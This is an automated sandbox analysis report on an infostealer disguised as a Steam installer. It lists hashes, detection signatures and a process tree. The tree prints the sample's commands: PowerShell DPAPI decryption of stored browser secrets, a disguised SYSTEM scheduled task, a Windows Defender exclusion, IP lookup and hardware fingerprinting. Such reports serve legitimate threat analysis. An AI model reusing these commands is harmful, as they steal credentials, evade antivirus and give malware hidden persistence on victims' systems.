Overview
overview
7Static
static
3Steam_6n0hahx7.exe
windows11-21h2-x64
$PLUGINSDI...ls.dll
windows11-21h2-x64
3$PLUGINSDI...em.dll
windows11-21h2-x64
3LICENSES.c...m.html
windows11-21h2-x64
1Steam.exe
windows11-21h2-x64
7d3dcompiler_47.dll
windows11-21h2-x64
1ffmpeg.dll
windows11-21h2-x64
1libEGL.dll
windows11-21h2-x64
1libGLESv2.dll
windows11-21h2-x64
1resources/elevate.exe
windows11-21h2-x64
1vk_swiftshader.dll
windows11-21h2-x64
1vulkan-1.dll
windows11-21h2-x64
1$PLUGINSDI...7z.dll
windows11-21h2-x64
3Analysis
-
max time kernel
4s -
max time network
10s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
07-04-2024 19:44
Static task
static1
Behavioral task
behavioral1
Sample
Steam_6n0hahx7.exe
Resource
win11-20240221-en
Behavioral task
behavioral2
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win11-20240221-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/System.dll
Resource
win11-20240221-en
Behavioral task
behavioral4
Sample
LICENSES.chromium.html
Resource
win11-20240221-en
Behavioral task
behavioral5
Sample
Steam.exe
Resource
win11-20240221-en
Behavioral task
behavioral6
Sample
d3dcompiler_47.dll
Resource
win11-20240221-en
Behavioral task
behavioral7
Sample
ffmpeg.dll
Resource
win11-20240221-en
Behavioral task
behavioral8
Sample
libEGL.dll
Resource
win11-20240214-en
Behavioral task
behavioral9
Sample
libGLESv2.dll
Resource
win11-20240221-en
Behavioral task
behavioral10
Sample
resources/elevate.exe
Resource
win11-20240221-en
Behavioral task
behavioral11
Sample
vk_swiftshader.dll
Resource
win11-20240221-en
Behavioral task
behavioral12
Sample
vulkan-1.dll
Resource
win11-20240221-en
Behavioral task
behavioral13
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win11-20240221-en
General
-
Target
Steam.exe
-
Size
154.5MB
-
MD5
8a3861c725d108eb0c1a17fa43f0487a
-
SHA1
e4b713028e43e0f99e4568aa3902384b52951ed2
-
SHA256
0177dec5005ce11309a54c49bc6a36c97008751db890b7bdf6c9eba48815acef
-
SHA512
db3765823fd8bea6e6b1c17b8144038586e5089b20c6ee70e517cb5c864ec874f82cf08696cebb48b148683de3f6bea93b65d26c58f166a7bb3defd49e5dd3ad
-
SSDEEP
1572864:UCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:eDAgZi
Malware Config
Signatures
-
Loads dropped DLL 1 IoCs
Processes:
Steam.exepid process 4576 Steam.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 api.ipify.org -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
cmd.execmd.exepid process 3524 cmd.exe 3156 cmd.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 648 tasklist.exe 4528 tasklist.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
tasklist.exetasklist.exedescription pid process Token: SeDebugPrivilege 648 tasklist.exe Token: SeDebugPrivilege 4528 tasklist.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
Steam.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4576 wrote to memory of 4896 4576 Steam.exe cmd.exe PID 4576 wrote to memory of 4896 4576 Steam.exe cmd.exe PID 4576 wrote to memory of 344 4576 Steam.exe cmd.exe PID 4576 wrote to memory of 344 4576 Steam.exe cmd.exe PID 344 wrote to memory of 648 344 cmd.exe tasklist.exe PID 344 wrote to memory of 648 344 cmd.exe tasklist.exe PID 4896 wrote to memory of 852 4896 cmd.exe curl.exe PID 4896 wrote to memory of 852 4896 cmd.exe curl.exe PID 4576 wrote to memory of 4760 4576 Steam.exe cmd.exe PID 4576 wrote to memory of 4760 4576 Steam.exe cmd.exe PID 4576 wrote to memory of 3524 4576 Steam.exe cmd.exe PID 4576 wrote to memory of 3524 4576 Steam.exe cmd.exe PID 4760 wrote to memory of 4528 4760 cmd.exe tasklist.exe PID 4760 wrote to memory of 4528 4760 cmd.exe tasklist.exe PID 3524 wrote to memory of 2488 3524 cmd.exe powershell.exe PID 3524 wrote to memory of 2488 3524 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Steam.exe"C:\Users\Admin\AppData\Local\Temp\Steam.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,142,201,190,236,119,164,249,229,41,6,194,37,239,167,184,163,113,143,87,88,255,118,110,201,100,66,207,20,108,252,227,68,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,182,249,61,2,159,110,24,25,13,161,36,186,14,75,78,120,216,53,125,15,64,189,193,186,132,116,79,103,202,186,94,48,0,0,0,152,140,232,44,188,166,20,101,3,247,171,153,99,3,74,178,253,152,73,92,23,31,142,140,189,199,211,146,124,26,26,111,64,189,223,72,118,238,118,127,166,126,39,230,8,162,176,235,64,0,0,0,180,244,68,231,242,166,178,241,72,22,15,194,14,178,91,91,84,8,166,233,155,101,48,41,247,47,79,140,45,53,245,186,235,199,214,238,172,241,176,13,60,70,213,189,216,77,98,203,211,240,139,15,138,215,20,227,41,204,192,211,179,39,141,8), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,142,201,190,236,119,164,249,229,41,6,194,37,239,167,184,163,113,143,87,88,255,118,110,201,100,66,207,20,108,252,227,68,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,182,249,61,2,159,110,24,25,13,161,36,186,14,75,78,120,216,53,125,15,64,189,193,186,132,116,79,103,202,186,94,48,0,0,0,152,140,232,44,188,166,20,101,3,247,171,153,99,3,74,178,253,152,73,92,23,31,142,140,189,199,211,146,124,26,26,111,64,189,223,72,118,238,118,127,166,126,39,230,8,162,176,235,64,0,0,0,180,244,68,231,242,166,178,241,72,22,15,194,14,178,91,91,84,8,166,233,155,101,48,41,247,47,79,140,45,53,245,186,235,199,214,238,172,241,176,13,60,70,213,189,216,77,98,203,211,240,139,15,138,215,20,227,41,204,192,211,179,39,141,8), $null, 'CurrentUser')3⤵PID:2488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,134,57,53,184,109,103,87,41,96,93,54,175,83,254,108,1,199,63,183,145,59,67,77,142,131,41,66,140,251,225,30,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,50,139,195,109,157,54,95,31,122,27,243,129,91,106,56,19,120,167,108,199,123,190,180,44,26,193,243,188,5,249,100,159,48,0,0,0,79,190,164,90,47,210,54,200,237,40,110,74,250,111,141,178,90,89,142,131,113,94,149,123,17,190,228,107,254,66,96,184,159,117,236,86,51,7,28,128,111,234,232,223,185,23,255,90,64,0,0,0,60,144,165,167,84,157,208,17,93,60,160,32,92,249,63,246,132,77,226,246,5,218,17,205,23,195,165,110,254,55,95,129,234,6,241,102,134,123,200,151,222,54,233,191,21,50,221,233,126,250,119,218,52,59,70,62,8,46,61,164,64,24,209,159), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:3156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,134,57,53,184,109,103,87,41,96,93,54,175,83,254,108,1,199,63,183,145,59,67,77,142,131,41,66,140,251,225,30,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,50,139,195,109,157,54,95,31,122,27,243,129,91,106,56,19,120,167,108,199,123,190,180,44,26,193,243,188,5,249,100,159,48,0,0,0,79,190,164,90,47,210,54,200,237,40,110,74,250,111,141,178,90,89,142,131,113,94,149,123,17,190,228,107,254,66,96,184,159,117,236,86,51,7,28,128,111,234,232,223,185,23,255,90,64,0,0,0,60,144,165,167,84,157,208,17,93,60,160,32,92,249,63,246,132,77,226,246,5,218,17,205,23,195,165,110,254,55,95,129,234,6,241,102,134,123,200,151,222,54,233,191,21,50,221,233,126,250,119,218,52,59,70,62,8,46,61,164,64,24,209,159), $null, 'CurrentUser')3⤵PID:4852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"2⤵PID:4816
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber3⤵PID:2868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"2⤵PID:2504
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f3⤵PID:5040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"2⤵PID:1008
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM3⤵
- Creates scheduled task(s)
PID:3120
-
-
-
C:\Users\Admin\AppData\Local\Temp\Steam.exe"C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1960,i,12471839113151150774,27583312757680621,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵PID:1828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3080
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:2188
-
-
-
C:\Users\Admin\AppData\Local\Temp\Steam.exe"C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --mojo-platform-channel-handle=1288 --field-trial-handle=1960,i,12471839113151150774,27583312757680621,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:82⤵PID:2736
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs""2⤵PID:3728
-
C:\Windows\system32\cscript.execscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs"3⤵PID:3088
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat" "4⤵PID:2252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"5⤵PID:1412
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"2⤵PID:1516
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber3⤵PID:4176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:664
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:1228
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"2⤵PID:2044
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid3⤵PID:1872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"2⤵PID:1232
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell wininit.exe3⤵PID:4796
-
C:\Windows\system32\wininit.exe"C:\Windows\system32\wininit.exe"4⤵PID:3116
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f10a836b72e0bf0946a8e1cd5fadce2c
SHA1586b63a56f0eb3e84be0cca2aa83a3ad66ad268e
SHA2565e314ed17c2e2997a8ffde8d3d68a05004fb29659ad1a10e698f04462a9d69d5
SHA5121ecfe04091c336147e372ea24defeeb0c965ad2a02f64e4c6f64edf25a1cf289b02456c782fd3a9a6f401f947fd07125c36c9bbcb5eff4ac11d2b99b5c3827fd
-
Filesize
1KB
MD57a2b288b6516ace3c60a8b6718511f0a
SHA17783140c099db9de2dcc5d5fc4ac79105e41f707
SHA256921c27cf4a64523fdcaa3f724a90a5f635da1f05541b7c6bcce9b5a892909ce9
SHA51256d57c9c46be4fef39b6d1a0cc5b769eec05f42a08323b41c222096831be315009860d4bd3d7dc5833887845d11806cf2eef24ce7e24888c2c30777f6918974f
-
Filesize
1KB
MD514bb94c36d909375f4a2c1163c1780fb
SHA102ff6e3a0293fe7428499390adacc96862e17d91
SHA256e291bdfc4667f621131172b199039aa4147404efa429ad54482073b4e46c391a
SHA5129241b39e96e443a40e9cb59b5db5f8e5724203742ecdad77f147bb59360fdf7d198ad49c44682d707fe3ab77b5cd01b1d9c27cfc8e3900ea2a99fad9a26cb0b6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.8MB
MD53072b68e3c226aff39e6782d025f25a8
SHA1cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA2567fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA51261ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61
-
Filesize
1KB
MD579a5e87823b83ea148f718b5fe237ec9
SHA1408431f7d062aef5017f2ce715b2da16a8585fa8
SHA2560626a1ecba78a0d83bddf6fceb66ba490e5ba176516e496faec4c1b3e344e2a1
SHA5122433d01f189a49a3155f46d494bc2a441faf0f29160d5709e92972d558afa22ac6bd71e089fbd7a19a39ca151f90b086d5cbb6e7f17f7460df35397cf73cf5a8
-
Filesize
155B
MD5849a5123f73771f6fe0e36056813e7cb
SHA1ccf4436fccf38a27cabf2603e61557976dbe3b01
SHA256e0388ef99c9337d7779c5cbca39cc51d558ca6aa2434f8d7e0794ae1cdb7c870
SHA5121204530de2c24b8ce159ec95044b9cb065a8aab95143b73467ea67fc3756c08f9b782dc9934ab98cfdb27f33caa6f7157b7750763f78e5406c46533ec37f9ebd